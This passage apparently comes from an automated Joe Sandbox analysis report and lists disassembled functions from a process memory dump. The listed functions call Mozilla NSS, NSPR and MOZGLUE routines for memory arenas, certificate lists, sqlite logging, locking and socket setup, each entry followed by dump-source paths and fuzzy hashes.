                                                              • free.MOZGLUE(?,?,6D1E7AFE,?,?,?,?,?,?,?,?,6D1E798A), ref: 6D1EBDCA
                                                              • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6D1E7AFE,?,?,?,?,?,?,?,?,6D1E798A), ref: 6D1EBDE9
                                                              • free.MOZGLUE(?,00000000,00000000,?,6D1E7AFE,?,?,?,?,?,?,?,?,6D1E798A), ref: 6D1EBE21
                                                              • free.MOZGLUE(00000000,00000000,?,6D1E7AFE,?,?,?,?,?,?,?,?,6D1E798A), ref: 6D1EBE32
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: free$CriticalDeleteDestroyMonitorSection
                                                              • String ID:
                                                              • API String ID: 3662805584-0
                                                              • Opcode ID: ae52404ec5ca9a5eeafb240d7acf5a4b94204bef3aa1b883e142d9481bac6172
                                                              • Instruction ID: 93ee3c2219bc67a837d04e10b3403c37b3cd6ecf4639561fa44925d96ddcbfa1
                                                              • Opcode Fuzzy Hash: ae52404ec5ca9a5eeafb240d7acf5a4b94204bef3aa1b883e142d9481bac6172
                                                              • Instruction Fuzzy Hash: 0611B0F99046019FDF31CF29D94EB033BB5BF6A658B460069E50A97220E771A418CBD2
                                                              APIs
                                                              • PR_Free.NSS3(?), ref: 6D1E7C73
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D1E7C83
                                                              • malloc.MOZGLUE(00000001), ref: 6D1E7C8D
                                                              • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6D1E7C9F
                                                              • PR_GetCurrentThread.NSS3 ref: 6D1E7CAD
                                                                • Part of subcall function 6D199BF0: TlsGetValue.KERNEL32(?,?,?,6D1E0A75), ref: 6D199C07
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CurrentFreeThreadValuemallocstrcpystrlen
                                                              • String ID:
                                                              • API String ID: 105370314-0
                                                              • Opcode ID: 910b42a0ef2ac95366617a6231aa9a4eeeee135025c2490a1136b71e421ebccb
                                                              • Instruction ID: c3d67d417f0c06188597eb9c030518fa3ba9d44ba2ce2b20518228403d8d72ce
                                                              • Opcode Fuzzy Hash: 910b42a0ef2ac95366617a6231aa9a4eeeee135025c2490a1136b71e421ebccb
                                                              • Instruction Fuzzy Hash: 0AF0A9F1D18A167BEB00AF3AAC099177B9CAF042A4B018426E80AC7201EB75E110CAE5
                                                              APIs
                                                              • DeleteCriticalSection.KERNEL32(6D1EA6D8), ref: 6D1EAE0D
                                                              • free.MOZGLUE(?), ref: 6D1EAE14
                                                              • DeleteCriticalSection.KERNEL32(6D1EA6D8), ref: 6D1EAE36
                                                              • free.MOZGLUE(?), ref: 6D1EAE3D
                                                              • free.MOZGLUE(00000000,00000000,?,?,6D1EA6D8), ref: 6D1EAE47
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: free$CriticalDeleteSection
                                                              • String ID:
                                                              • API String ID: 682657753-0
                                                              • Opcode ID: 499932af1cb82078c28bed91cfcaedea1621e304068c2e5d3c4721d0e1ee755c
                                                              • Instruction ID: 49d7243a71aed6a97d43cd18c3af4a02f2f5a59dceae9178de3135ce92c29779
                                                              • Opcode Fuzzy Hash: 499932af1cb82078c28bed91cfcaedea1621e304068c2e5d3c4721d0e1ee755c
                                                              • Instruction Fuzzy Hash: A4F09675000A02ABCB108F68D80DE577778BF86B797140368F52A83540E731E125D7D5
                                                              APIs
                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D077D35
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: sqlite3_log
                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                              • API String ID: 632333372-598938438
                                                              • Opcode ID: 8c35a254de825f2c7b0e58aa9815d80f74fa82226e16bf8cfd04549ce988b366
                                                              • Instruction ID: b396fb401ff1daece2bc65ca60c97b226f8ca96d843fe28785354c3c003da133
                                                              • Opcode Fuzzy Hash: 8c35a254de825f2c7b0e58aa9815d80f74fa82226e16bf8cfd04549ce988b366
                                                              • Instruction Fuzzy Hash: 7C312871E4422997D720CF9DC880ABEBBF2FFC8345B5541A9E545BB282D270DC41C7A8
                                                              APIs
                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6D066D36
                                                              Strings
                                                              • %s at line %d of [%.10s], xrefs: 6D066D2F
                                                              • database corruption, xrefs: 6D066D2A
                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D066D20
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: sqlite3_log
                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                              • API String ID: 632333372-598938438
                                                              • Opcode ID: 9cec8ce6b13a10fca73c56b67b73ab89c4c4342dc6c485d6b1ee0a85397193bb
                                                              • Instruction ID: f0bda68dd604a79c77b31eaa0b58d28a8f010d23bf2c928463f5ba2950d9cc7a
                                                              • Opcode Fuzzy Hash: 9cec8ce6b13a10fca73c56b67b73ab89c4c4342dc6c485d6b1ee0a85397193bb
                                                              • Instruction Fuzzy Hash: 3C21FF30E04345ABE710CE19C940B6AB7F6BF85318FA085ACD94A9B751E771F944CBE2
                                                              APIs
                                                                • Part of subcall function 6D19CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6D19CC7B), ref: 6D19CD7A
                                                                • Part of subcall function 6D19CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6D19CD8E
                                                                • Part of subcall function 6D19CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6D19CDA5
                                                                • Part of subcall function 6D19CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6D19CDB8
                                                              • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6D19CCB5
                                                              • memcpy.VCRUNTIME140(6D2314F4,6D2302AC,00000090), ref: 6D19CCD3
                                                              • memcpy.VCRUNTIME140(6D231588,6D2302AC,00000090), ref: 6D19CD2B
                                                                • Part of subcall function 6D0B9AC0: socket.WSOCK32(?,00000017,6D0B99BE), ref: 6D0B9AE6
                                                                • Part of subcall function 6D0B9AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6D0B99BE), ref: 6D0B9AFC
                                                                • Part of subcall function 6D0C0590: closesocket.WSOCK32(6D0B9A8F,?,?,6D0B9A8F,00000000), ref: 6D0C0597
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                              • String ID: Ipv6_to_Ipv4 layer
                                                              • API String ID: 1231378898-412307543
                                                              • Opcode ID: ceba653f35eb36db3bb3106c7f4ab35c7b4c891437322ddae962e0f930409cb8
                                                              • Instruction ID: be0c714e19f446289821fdce8483bd3796d1cc4d9cd666665683ba543f0f8734
                                                              • Opcode Fuzzy Hash: ceba653f35eb36db3bb3106c7f4ab35c7b4c891437322ddae962e0f930409cb8
                                                              • Instruction Fuzzy Hash: 221181F99047549EEB228F5A9849B537BB8A34625DF120029E60EDB349E7F14481CBD3
                                                              APIs
                                                              • PORT_ArenaMark_Util.NSS3(?), ref: 6D141D8F
                                                                • Part of subcall function 6D1314C0: TlsGetValue.KERNEL32 ref: 6D1314E0
                                                                • Part of subcall function 6D1314C0: EnterCriticalSection.KERNEL32 ref: 6D1314F5
                                                                • Part of subcall function 6D1314C0: PR_Unlock.NSS3 ref: 6D13150D
                                                              • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6D141DA6
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D1310F3
                                                                • Part of subcall function 6D1310C0: EnterCriticalSection.KERNEL32(?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13110C
                                                                • Part of subcall function 6D1310C0: PL_ArenaAllocate.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131141
                                                                • Part of subcall function 6D1310C0: PR_Unlock.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131182
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13119C
                                                              • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6D141E13
                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6D141ED0
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
                                                              • String ID:
                                                              • API String ID: 84796498-0
                                                              • Opcode ID: 047f7b7ac01b7ffcf8b0672c46ca0b674935fe243e42a62549ab587f67e5f0ef
                                                              • Instruction ID: 1158956b2bc37481b71434ade283f1a1e783cec2304a4a9b891a28f0899215a6
                                                              • Opcode Fuzzy Hash: 047f7b7ac01b7ffcf8b0672c46ca0b674935fe243e42a62549ab587f67e5f0ef
                                                              • Instruction Fuzzy Hash: 5251AE75A40309DFDB01CF94C884BAEB7B6FF49308F118129E919AF258D7B1E995CB80
                                                              APIs
                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D1A7E10
                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D1A7EA6
                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D1A7EB5
                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6D1A7ED8
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: _byteswap_ulong
                                                              • String ID:
                                                              • API String ID: 4101233201-0
                                                              • Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                              • Instruction ID: f0d94331eec2d433225310123fde88db5dbca82e824c1a36c772303ca4395690
                                                              • Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                              • Instruction Fuzzy Hash: 1831B7B5E402118FD705CF08C89099AB7E2FF88314B1F816AD9595B319EBB1ED51CBD1
                                                              APIs
                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6D0D6C8D
                                                              • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6D0D6CA9
                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6D0D6CC0
                                                              • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6D1F8FE0), ref: 6D0D6CFE
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                              • String ID:
                                                              • API String ID: 2370200771-0
                                                              • Opcode ID: 6a8b2fd9723cc2934a71ef5abed0a170e1ff47acfd03b58644a915068e47ad1c
                                                              • Instruction ID: c8c5e6b1f020e938e29a4734c9654a1ce9d3a1903d5a7d76217701577539333b
                                                              • Opcode Fuzzy Hash: 6a8b2fd9723cc2934a71ef5abed0a170e1ff47acfd03b58644a915068e47ad1c
                                                              • Instruction Fuzzy Hash: 8A318BB1A0021A9FEB08DFA5D890ABFBBF5EB49244B50442ED905E7300EB719901CBE0
                                                              APIs
                                                              • PR_MillisecondsToInterval.NSS3(?), ref: 6D146E36
                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D146E57
                                                                • Part of subcall function 6D17C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D17C2BF
                                                              • PR_MillisecondsToInterval.NSS3(?), ref: 6D146E7D
                                                              • PR_MillisecondsToInterval.NSS3(?), ref: 6D146EAA
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: IntervalMilliseconds$ErrorValue
                                                              • String ID:
                                                              • API String ID: 3163584228-0
                                                              • Opcode ID: 923b32d96bc5575d271b93ae2eff7f3bb68404659d8774889446d2f7d93c0b6c
                                                              • Instruction ID: 501ff9f90d158102fd3cfcec674f34f75e150585d51513d1040af7dd2fe3a66d
                                                              • Opcode Fuzzy Hash: 923b32d96bc5575d271b93ae2eff7f3bb68404659d8774889446d2f7d93c0b6c
                                                              • Instruction Fuzzy Hash: 8331DF3169461BEEDB149F34C8143EBB7E4AB2131EF11863CD999A6248EBB06854CBD1
                                                              APIs
                                                              • PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6D12DDB1,?,00000000), ref: 6D12DDF4
                                                                • Part of subcall function 6D1314C0: TlsGetValue.KERNEL32 ref: 6D1314E0
                                                                • Part of subcall function 6D1314C0: EnterCriticalSection.KERNEL32 ref: 6D1314F5
                                                                • Part of subcall function 6D1314C0: PR_Unlock.NSS3 ref: 6D13150D
                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6D12DDB1,?,00000000), ref: 6D12DE0B
                                                              • PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6D12DDB1,?,00000000), ref: 6D12DE17
                                                                • Part of subcall function 6D130BE0: malloc.MOZGLUE(6D128D2D,?,00000000,?), ref: 6D130BF8
                                                                • Part of subcall function 6D130BE0: TlsGetValue.KERNEL32(6D128D2D,?,00000000,?), ref: 6D130C15
                                                              • PR_SetError.NSS3(FFFFE009,00000000), ref: 6D12DE80
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
                                                              • String ID:
                                                              • API String ID: 3725328900-0
                                                              • Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                              • Instruction ID: d3bb6380ea05c4ff9867183b33a9dae227dc38049b6251d58c52ff27d7ea1272
                                                              • Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                              • Instruction Fuzzy Hash: 3F31C2B1944B429BE700CF16D880666B7E4BFF5328B15822AD91C87709E7F6E5E0CBD0
                                                              APIs
                                                              • PORT_ArenaMark_Util.NSS3(?), ref: 6D142E08
                                                                • Part of subcall function 6D1314C0: TlsGetValue.KERNEL32 ref: 6D1314E0
                                                                • Part of subcall function 6D1314C0: EnterCriticalSection.KERNEL32 ref: 6D1314F5
                                                                • Part of subcall function 6D1314C0: PR_Unlock.NSS3 ref: 6D13150D
                                                              • PORT_NewArena_Util.NSS3(00000400), ref: 6D142E1C
                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6D142E3B
                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6D142E95
                                                                • Part of subcall function 6D131200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6D0D88A4,00000000,00000000), ref: 6D131228
                                                                • Part of subcall function 6D131200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6D131238
                                                                • Part of subcall function 6D131200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6D0D88A4,00000000,00000000), ref: 6D13124B
                                                                • Part of subcall function 6D131200: PR_CallOnce.NSS3(6D232AA4,6D1312D0,00000000,00000000,00000000,?,6D0D88A4,00000000,00000000), ref: 6D13125D
                                                                • Part of subcall function 6D131200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6D13126F
                                                                • Part of subcall function 6D131200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6D131280
                                                                • Part of subcall function 6D131200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6D13128E
                                                                • Part of subcall function 6D131200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6D13129A
                                                                • Part of subcall function 6D131200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6D1312A1
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                              • String ID:
                                                              • API String ID: 1441289343-0
                                                              • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                              • Instruction ID: 7b3083e9b7adcb6e7c37c996c748dec30ff5b4e4aa2dccb6b02ec7044d409d9e
                                                              • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                              • Instruction Fuzzy Hash: D321F971E543554BEB10CF549D4077B37646FA130CF138269DE08AB24AF7F2D5D482A1
                                                              APIs
                                                              • CERT_NewCertList.NSS3 ref: 6D0FACC2
                                                                • Part of subcall function 6D0D2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6D0D2F0A
                                                                • Part of subcall function 6D0D2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6D0D2F1D
                                                                • Part of subcall function 6D0D2AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6D0D0A1B,00000000), ref: 6D0D2AF0
                                                                • Part of subcall function 6D0D2AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D0D2B11
                                                              • CERT_DestroyCertList.NSS3(00000000), ref: 6D0FAD5E
                                                                • Part of subcall function 6D1157D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6D0DB41E,00000000,00000000,?,00000000,?,6D0DB41E,00000000,00000000,00000001,?), ref: 6D1157E0
                                                                • Part of subcall function 6D1157D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6D115843
                                                              • CERT_DestroyCertList.NSS3(?), ref: 6D0FAD36
                                                                • Part of subcall function 6D0D2F50: CERT_DestroyCertificate.NSS3(?), ref: 6D0D2F65
                                                                • Part of subcall function 6D0D2F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6D0D2F83
                                                              • free.MOZGLUE(?), ref: 6D0FAD4F
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                              • String ID:
                                                              • API String ID: 132756963-0
                                                              • Opcode ID: 4f508c9c690b11861508b250e00b442bd96f1005765f23c1362cc5ce7b7fa68b
                                                              • Instruction ID: 17988873b21fa8584a8dba0cd79e238ef8a6f2b9963d9060f6aadd1e8aff4a44
                                                              • Opcode Fuzzy Hash: 4f508c9c690b11861508b250e00b442bd96f1005765f23c1362cc5ce7b7fa68b
                                                              • Instruction Fuzzy Hash: 6921C3B1C043148BFB10DFA4D905BAEB7B4EF45208F664069DC05BB201FB31AA56CBE1
                                                              APIs
                                                              • TlsGetValue.KERNEL32 ref: 6D123C9E
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D123CAE
                                                              • PR_Unlock.NSS3(?), ref: 6D123CEA
                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6D123D02
                                                              Memory Dump Source
